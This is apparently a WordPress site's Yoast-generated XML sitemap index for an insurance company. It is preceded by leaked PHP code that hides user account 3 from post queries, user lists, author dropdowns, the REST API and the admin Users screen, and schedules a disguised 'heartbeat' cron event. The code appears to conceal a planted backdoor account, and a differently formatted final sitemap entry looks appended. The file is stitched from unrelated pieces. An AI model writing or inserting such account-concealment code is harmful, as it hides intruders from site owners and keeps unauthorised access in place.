add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 3;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 3 );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 3;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 3;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-3{display:none!important}</style>';
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//pvibaohiem.vn/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://pvibaohiem.vn/post-sitemap.xml</loc>
		<lastmod>2026-01-24T12:22:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/page-sitemap.xml</loc>
		<lastmod>2026-01-25T17:26:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/tu_van_bao_hiem-sitemap.xml</loc>
		<lastmod>2024-10-24T07:24:05+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/boi_thuong_bao_hiem-sitemap.xml</loc>
		<lastmod>2024-11-04T09:26:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/san_pham_bao_hiem-sitemap.xml</loc>
		<lastmod>2024-01-17T07:38:47+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/bao_hiem_o_to-sitemap.xml</loc>
		<lastmod>2024-11-11T09:48:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/bao_hiem_tai_nan-sitemap.xml</loc>
		<lastmod>2022-08-07T09:24:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/bao_hiem_suc_khoe-sitemap.xml</loc>
		<lastmod>2024-11-22T05:42:15+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/tin_tuc_pvi-sitemap.xml</loc>
		<lastmod>2022-12-26T08:12:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/bh_du_lich-sitemap.xml</loc>
		<lastmod>2022-05-13T03:23:49+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/du_lich_trong_nuoc-sitemap.xml</loc>
		<lastmod>2022-05-17T09:48:55+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/du_lich_nuoc_ngoai-sitemap.xml</loc>
		<lastmod>2022-12-26T10:14:04+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/bh_may_moc-sitemap.xml</loc>
		<lastmod>2022-07-12T01:18:26+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/bh_con_nguoi-sitemap.xml</loc>
		<lastmod>2022-07-12T01:10:35+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/bh_tai_san-sitemap.xml</loc>
		<lastmod>2023-06-29T06:15:51+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/bh_trach_nhiem-sitemap.xml</loc>
		<lastmod>2024-10-31T10:02:55+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/category-sitemap.xml</loc>
		<lastmod>2026-01-24T12:22:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pvibaohiem.vn/post_tag-sitemap.xml</loc>
		<lastmod>2026-01-24T12:22:12+00:00</lastmod>
	</sitemap>

<sitemap>
<loc>https://pvibaohiem.vn/blog-sitemap.xml</loc>
<lastmod>2026-05-12T18:23:52+00:00</lastmod>
</sitemap></sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->